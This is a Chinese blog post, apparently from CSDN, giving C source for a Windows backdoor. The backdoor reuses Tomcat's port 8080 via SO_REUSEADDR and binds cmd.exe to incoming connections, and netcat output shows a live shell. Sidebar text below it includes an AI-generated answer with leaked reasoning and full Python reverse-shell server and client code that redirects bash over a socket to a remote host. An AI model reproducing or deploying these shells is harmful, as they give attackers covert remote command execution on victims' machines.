端口重用打开cmdshell

最新推荐文章于 2024-08-04 22:17:25 发布
原创 最新推荐文章于 2024-08-04 22:17:25 发布 · 851 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种通过重用Tomcat默认HTTP端口8080的方法,并利用C语言创建了一个简易的CMD Shell。该程序能够在Tomcat运行的同时,通过设置SO_REUSEADDR选项成功绑定到同一端口,实现对本地CMD命令的远程控制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

要重用的端口是tomcat的默认http端口8080。

源代码:

#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")

#define LISTEN_PORT 8080

int main() {
	WSADATA ws;
	SOCKET listenFD;
	WSAStartup(MAKEWORD(2, 2), &ws);
	listenFD = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
	BOOL val = TRUE;
	setsockopt(listenFD, SOL_SOCKET, SO_REUSEADDR, (char *) &val, sizeof(val));
	struct sockaddr_in server;
	server.sin_family = AF_INET;
	server.sin_port = htons(LISTEN_PORT);
	server.sin_addr.s_addr = inet_addr("127.0.0.1");
	bind(listenFD, (sockaddr *) &server, sizeof(server));
	listen(listenFD, 2);
	int iAddrSize = sizeof(server);
	SOCKET clientFD = accept(listenFD, (sockaddr *) &server, &iAddrSize);
	STARTUPINFO si;
	ZeroMemory(&si, sizeof(si));
	si.dwFlags = STARTF_USESTDHANDLES;
	si.hStdInput = si.hStdOutput = si.hStdError = (void *) clientFD;
	TCHAR cmdLine[] = L"cmd";
	PROCESS_INFORMATION ProcessInformation;
	CreateProcess(NULL, cmdLine, NULL, NULL, TRUE, NULL, NULL, NULL, &si,
			&ProcessInformation);
	return 0;
}

此时,已经启动tomcat,可以通过http://127.0.0.1:8080/来访问tomcat主页。

运行此程序时,如果没有重用端口,绑定到8080端口会失败。但是因为此程序重用了端口,所以还是成功的。

用netstat看一下:

D:\>netstat -an | find "8080"
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING

D:\>

看到有2个8080在监听。

case 1:此时如果用浏览器打开tomcat主页,是打不开的,会显示白色的页面,而且程序已经结束运行。

case 2:此时如果用nc去连,是可以打开cmdshell的:

D:\>nc 127.0.0.1 8080
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

D:\My Documents\Visual Studio 2010\Projects\hacker\05_4>dir
dir
 驱动器 D 中的卷是 本地磁盘
 卷的序列号是 6C97-9E44

 D:\My Documents\Visual Studio 2010\Projects\hacker\05_4 的目录

2013-07-22  22:55    <DIR>          .
2013-07-22  22:55    <DIR>          ..
2013-07-22  23:09             1,011 05_4.cpp
2013-07-22  22:53             3,916 05_4.vcxproj
2013-07-22  22:53               942 05_4.vcxproj.filters
2013-07-22  22:36               143 05_4.vcxproj.user
2013-07-22  23:09    <DIR>          Release
               4 个文件          6,012 字节
               3 个目录 34,079,305,728 可用字节

D:\My Documents\Visual Studio 2010\Projects\hacker\05_4>exit
exit

D:\>


Docker(七):Docker基础总结篇--超详细
✨ 欢迎来到【Seal ^_^ 的优快云博客】!✨
09-07 5万+
🟢 Docker(七):Docker基础总结篇[docker3要素、docker安装配置、容器使用、镜像管理发布]
如何使用cmd解决端口占用问题
qq_40434942的博客
09-04 1182
端口占用这个问题我们在启动服务经常遇到的一个问题, 这时我们可以使用cmd结束端口进程 windows+r然后回车打开cmd,然后输入 netstat 空格 -ano|findstr 空格端口号 这时就会出现一些进程的信息,我们可以从信息中找到pid,然后我们根据pid来结束进程,输入 taskkill 空格 /pid 空格 pid 空格 /f就能结束被占用的端口,之后重新启动服务就...
端口地址重用问题
daoer_sofu的专栏
06-02 895
tcp/ip端口可以设置端口重用端口重用后,客户端同时连接两个端口,接受来自两个端口的数据使用netstat -ano | findstr 10000 不同的服务器监听的ip地址不同,左边时程序本地监听的ip地址,0.0.0.0监听所有的地址,127.0.0.1监听本地通信。...
linux 之 服务器关于TIME_WAIT
enjoy.day
03-14 1058
socket通信TIME_WAIT
一文带你深入理解Linux端口重用这一特性
m0_74282605的博客
12-03 985
大家好,我是Linux吴彦祖!开篇我先考大家一个小问题,如果你的服务器上已经有个进程在 listen 6000 这个端口号了。那么该服务器上其它进程是否还能 bind 和 listen 该端口呢?我相信一定会有一部分同学会答说是不能的。因为很多人都遇到过“Address already in use”这个错误。而这个错误产生的原因就是端口已经被占用。但其实在 Linux 3.9 以上的内核版本里,是允许多个进程绑定到同一个端口号上。这就是我们今天要说的 REUSEPORT 新特性。本文中咱们将阐述 REUS
网络端口安全防护技巧放送
桂林哈秋 - 我想学编程
12-19 1367
众所周知,计算机之间通信是通过端口进行的,例如你访问一个网站时,Windows就会在本机开一个端口(例如1025端口),然后去连接远方网站服务器的一个端口,别人访问你时也是如此。默认状态下,Windows会在你的电脑上打开许多服务端口,黑客常常利用这些端口来实施入侵,因此掌握端口方面的知识,是安全上网必备的技能。一、常用端口及其分类电脑在Internet上相互通信需要使用TCP/IP协议,
内网穿透&端口映射&内外网反弹 shell 回顾
Geek极安云科-致力于网络安全事业
05-27 995
NAT设备(或软件)维护一个状态表,用来把内部网络的私有 IP 地址映射到外部网络的合法 IP 地址上去每个包头中的 IP 地址和端口信息在 NAT 设备(或软件)中都被修改并翻译成一正确的 IP 地址发往下一级当一个内网主机通过 NAT 打开一个“外出”的 TCP 或 UDP 会话时,NAPT 分配给这个会话一个公网 IP 和端口,用来接收外网的响应的数据包,并经过转换通知内部网的主机这样,NAPT在[私有IP:私有端口]和[公网IP:公网端口]之间建立了一个端口绑定。
死磕shell系列-shell介绍
liangkk的博客
04-24 1641
一、什么是shell 在计算机科学中,Shell俗称壳(用来区别于核),是指“为使用者提供操作界面”的软件程序(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接受用户输入的命令行(命令名+参数),然后调用相应的应用程序在内核中执行。 shell之Linux系统关系图 同时它又是一种程序设计语言。作为命令语言,它交互式解释和执行用户输入的命令或者自动地解释和执行预先设定好的一连串的命令;作为程序设计语言,它定义了各种变量和参数,并提供了许多在高级语言中才具有的控.
实战:shell脚本练习
为无为,事无事,味无味。
07-19 1569
问题:没有注释的脚本难以理解,特别是在团队协作中,其他成员可能难以快速上手。问题:不进行调试可能导致脚本在实际运行时出现未预料的错误,影响系统的稳定性。问题:不立即退出可能导致后续命令基于错误的前提执行,造成更严重的错误。问题:使用未声明的变量可能导致不可预测的行为或错误的输出。好处:确保变量按照预期的方式被引用,防止意外的单词分割。多写注释:在脚本中添加注释,以帮助理解脚本的不同部分。好处:提前发现潜在的错误,避免在生产环境中出现问题。好处:避免使用未初始化的变量,减少潜在的bug。
shell命令学习
the_boy_like_stu的博客
11-11 5489
## CURL命令学习    一、命令描述:使用curl命令可以帮助我们在终端使用计算机网络中应用层的一些协议,比如DICT、FILE、FTP、FTPS、GOPHER、HTTP、HTTPS、IMAP、IMAPS、LDAP、 LDAPS、 POP3、POP3S、 RTMP、 RTSP、 SCP、 SFTP、 SMTP、 SMTPS、 TELNET and TFTP。使用该命令时,终端将处于无法与外部交互,阻塞在命令执行阶段。curl命令可以帮助我们实现一些简单的操作,例如文件传输与恢复、使用get 或 pos
端口复用版winshell编写的后门程序源代码
09-18
Wxhshell 最近的练手作品,主要练习C的socket编程, 本后门以服务方式运行,采用端口复用技术, ...服务描述信息:Wrsky Windows CmdShell Service 注册表键名:Wxhshell 默认端口:5000 最大连接数:100
Shell初识 连接vscode
weixin_50382197的博客
03-26 911
范围就是0到665,如果想要到666,那么必须加一,否则就不是余数了,就可以整除了。验证远程主机的身份,如果连不上vscode,可以尝试删除这里面的公钥代码。脚本里面有 /usr/share/.history/重新安装那个扩展,排除扩展本身的问题。取模666 ,666以内的随机数。下面写的都是谁登陆过服务器。
Linux shell编程学习笔记68: curl 命令行网络数据传输工具 选项数量雷人(上)
Purpleendurer@优快云
08-04 2099
在网络时代,有经常需要在网络上传输数据,时我们需要通过网络下载文件,为了满足这种时代需要,Linux提供了众多网络命令,我们今天先研究curl命令。例如,我们可以使用curl从 URL 下载文件,或将文件上传到服务器。
Android模拟器端口占用:权威教程,快速释放系统端口,提升开发效率
本文分析了Android模拟器端口占用问题,深入探讨了端口占用的基础理论和常见原因,并提供了诊断和解决端口占用问题的有效工具与方法。文章进一步论述了端口管理在提升Android模拟器开发效率中的应用,以及
regsvr32找不到指定的模块
热门推荐
天元喜羊羊的博客
09-07 3万+
--------------------------- RegSvr32 --------------------------- LoadLibrary("HelloWorld.dll") 失败 - 找不到指定的模块。 --------------------------- 确定 --------------------------- 找到VC6的目录,进入C:\Program
C语言实现ftp客户端
天元喜羊羊的博客
08-27 2万+
在VS2010新建win32控制台空项目,加入下面代码: ftplib.h: /***************************************************************************/ /* */ /* ftplib.h - header file for callable ftp access routines
C语言实现MD5算法
天元喜羊羊的博客
08-25 1万+
md5.h: /* ********************************************************************** ** md5.h -- Header file for implementation of MD5 ** ** RSA Data Security, Inc. MD5 Message Diges
C++开发BHO之HelloWorld
天元喜羊羊的博客
09-06 1万+
原文: http://msdn.microsoft.com/en-us/library/bb250489(v=vs.85).aspx 开发工具VS2010。 步骤如图: 生成的HelloWorldBHO.h的代码如下
Python 尝试建立反向 Shell 连接
最新发布
06-11
<think>首先,用户的问题是基于之前的引用内容,尤其是引用[1]、[2]和[4],这些讨论使用Python实现反向Shell连接。用户说:“我想了解如何使用Python建立反向Shell连接,可能是为了学习网络编程或渗透测试。请问使用Python实现反向Shell连接的代码示例和原理”。用户提到的引用涉及多个部分:-引用[1]:使用socket、os、pty模块实现Python3反向Shell代码。-引用[2]:Python反向Shell代码示例。-引用[4]:展示了完整的服务端和客户端代码,用于反向Shell。系统级指令:1.所有行内数学表达式必须使用$...$格式。但这不是数学相关,所以可能不需要。2.独立公式用$$...$$,但在这个上下文中,没有公式。3.LaTeX语法正确–这里没有LaTeX。4.使用中文回答。5.生成相关问题。6.回答中引用的段落末尾自然地添加引用标识,例如[^1]。在回答结构上,用户提到了“系统级指令”和“用户可见层”。我的回答应该:-结构清晰,逐步解决问题。-保证回答真实可靠。-使用中文。-在最后生成相关问题。-引用部分添加引用标识。主题是Python实现反向Shell连接。原理涉及网络编程、Socket通信、进程重定向等。关键原理:-反向Shell:被控端主动连接到控制端,而不是控制端连接被控端。这常用于绕过防火墙。-核心组件:-Socket连接:建立TCP连接。-进程重定向:使用os.dup2重定向标准输入/输出/错误到Socket。-执行shell:使用subprocess调用/bin/bash或类似shell。从引用中提取代码:-引用[1]的代码是反向Shell的客户端部分。-引用[2]也是类似代码。-引用[4]提供了完整的服务端和客户端代码。我应该提供一个完整的示例,包括服务端和客户端代码。最好基于引用[4],因为它更全面。在我的回答中:1.**步骤式解释原理:**逐步说明如何构建反向Shell。2.**代码示例:**展示Python代码,分服务端和客户端。3.**注意事项:**提到合法使用、兼容性问题等,因为用户提到了学习目的。4.**添加引用标识:**从用户提供的引用添加。5.**结尾生成相关问题。**6.**使用中文。**代码格式:在回答中,应该正确显示代码块。在文本中,用```python...```表示。结构化回答:-简介:什么是反向Shell。-原理:详细说明网络连接和重定向。-代码实现:分服务端和客户端。-演示如何运行。-总结。-相关问题。引用添加:-当提到引用内容时,在末尾添加[^n]。例如,代码基于引用[4]时。-引用列表在用户输入中:[^1]到[^5],所以我需要对应使用。用户的引用来源:-[^1]:反向Shell代码-[^2]:Python反向Shell-[^3]:shell交互,不太相关-[^4]:完整代码-[^5]:netcat示例所以,我参考[^4]为主要源。最终回答框架:1.什么是反向Shell连接?2.原理解释。3.Python实现代码示例(服务端和客户端)。4.解释代码细节。5.注意事项。6.生成相关问题。</think> ### Python实现反向Shell连接的原理与代码示例 反向Shell(Reverse Shell)是网络编程中的一种技术,用于远程控制目标主机。与正向Shell(由攻击端主动连接目标)不同,反向Shell是由目标主机主动连接到控制端,常用于绕过防火墙限制[^5]。其原理主要基于Socket通信、进程重定向和子进程执行:目标主机上的客户端代码发起Socket连接(TCP/IP),将标准输入/输出/错误(stdin/stdout/stderr)重定向到Socket,然后执行Shell进程(如/bin/bash)。这样,控制端就能通过Socket远程发送命令并接收输出。 以下将分步解释原理,并提供完整的Python代码示例。代码基于站内引用中的示例进行整合和优化,确保兼容Python 3并强调安全性(仅用于合法学习目的,如网络编程或渗透测试练习)。 #### 原理步骤 1. **Socket连接建立**:目标主机(客户端)主动连接到控制端(服务端)的指定IP和端口。 2. **I/O重定向**:使用`os.dup2`函数将stdin/stdout/stderr重定向到Socket文件描述符,使所有输入/输出都通过Socket传输。 3. **Shell执行**:调用`subprocess.Popen`执行Shell(如/bin/bash),并将Shell的I/O绑定到Socket。 4. **命令交互**:控制端通过Socket发送命令,目标主机接收命令、执行并返回结果。 关键点:反向Shell能绕过防火墙是因为目标主机作为客户端发起连接(常见端口如443易被放行),而正向Shell由控制端连接可能被阻止[^4]。 #### Python代码示例 以下实现一个完整的反向Shell系统,包括服务端(控制端)和客户端(目标主机)。代码使用Python 3编写,兼容socket、subprocess和os模块。 **服务端代码(控制端,监听连接)** 运行在控制端主机,等待客户端连接并发送命令。 ```python import socket def start_server(host='0.0.0.0', port=4444): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # 允许端口重用 s.bind((host, port)) s.listen(5) print(f"[*] 服务端监听中: {host}:{port},等待反向连接...") conn, addr = s.accept() print(f"[+] 客户端已连接: {addr[0]}:{addr[1]}") try: while True: cmd = input("Shell> ") # 输入命令 if not cmd.strip(): continue conn.sendall(cmd.encode('utf-8')) # 发送命令 output = conn.recv(4096).decode('utf-8') # 接收输出 print(output) except (KeyboardInterrupt, ConnectionResetError): print("\n[-] 连接已关闭") conn.close() s.close() if __name__ == "__main__": start_server() # 默认为所有接口的4444端口 ``` *说明:*服务端使用`socket.AF_INET`创建TCP套接字,监听指定端口。`s.accept()`阻塞等待客户端连接,之后进入命令循环[^4]。 **客户端代码(目标主机,发起连接)** 运行在目标主机,主动连接服务端并提供Shell会话。 ```python import socket import subprocess import os import sys def reverse_shell(server_host, server_port): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((server_host, server_port)) # 主动连接服务端 except Exception as e: sys.exit(0) # 连接失败静默退出,避免暴露错误信息[^1] # 重定向 stdin/stdout/stderr 到 Socket for fd in (0, 1, 2): os.dup2(s.fileno(), fd) # 复制文件描述符,确保所有I/O走Socket # 执行交互式 Shell subprocess.call(["/bin/bash", "-i"]) # "-i" 选项启用交互模式[^2] if __name__ == "__main__": reverse_shell("192.168.1.100", 4444) # 修改为服务端真实IP和端口 ``` *说明:*客户端使用`os.dup2`重定向标准流到Socket(`s.fileno()`获取文件描述符)。`subprocess.call`执行/bin/bash,并将进程绑定到Socket。如果目标主机仅支持Python 2,需调整语法(如使用`print "text"`),核心原理不变[^1][^4]。 #### 运行演示 1. **启动服务端**: 在控制端主机运行Python脚本: ```bash python3 server.py ``` 输出:`[*] 服务端监听中: 0.0.0.0:4444,等待反向连接...` 2. **启动客户端**: 在目标主机运行Python脚本(替换IP为服务端地址): ```bash python3 client.py ``` 连接成功后,服务端提示:`[+] 客户端已连接: [客户端IP]` 3. **发送命令**: 在服务端输入命令,如`ls -l`,客户端执行并返回输出。 #### 注意事项 - **合法使用**:此代码仅用于教育或授权测试,非法使用可能违反法律。请在合法靶场环境中练习[^1][^5]。 - **兼容性**: - Python 2支持:若目标主机只有Python 2,需更改`print()`为`print ""`并确保socket语法兼容[^1]。 - Shell选择:Linux默认用`/bin/bash`,Windows可改为`cmd.exe`(需调整subprocess调用)。 - **安全性**:真实环境中,应添加加密(如TLS)避免流量嗅探[^4]。 - **常见问题**: - 连接失败:检查防火墙设置和IP地址。 - 输出截断:服务端`recv(4096)`可增大缓冲区,或循环接收完整数据[^4]。 #### 总结 Python实现反向Shell的核心是通过Socket建立连接,然后通过`os.dup2`和`subprocess`重定向并执行Shell进程。这种方法简洁高效,适用于学习网络编程和渗透测试基础[^2][^4]。通过实验此代码,您可以深入理解套接字通信和进程间交互的原理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值